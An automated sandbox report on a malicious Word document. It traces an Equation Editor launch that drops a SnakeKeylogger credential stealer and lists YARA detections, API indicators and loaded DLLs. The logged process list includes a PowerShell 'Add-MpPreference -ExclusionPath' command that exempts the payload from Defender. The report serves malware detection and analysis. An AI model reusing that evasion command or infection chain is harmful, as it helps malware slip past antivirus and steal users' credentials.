                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: qHbynE8Vgwabsy3[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: cdlpohayugo39567.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, nkQiD6cY1Ydm4FTjxb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, nkQiD6cY1Ydm4FTjxb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, nkQiD6cY1Ydm4FTjxb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@28/9
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$na.docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC927.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........%.........................s.................... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................<%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................P%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................]%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....t%.........................s....................$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............................................Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: na.docReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: na.LNK.0.drLNK file: ..\..\..\..\..\Desktop\na.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: na.docStatic file information: File size 1838683 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: vqar.pdb source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr
                  Source: Binary string: vqar.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
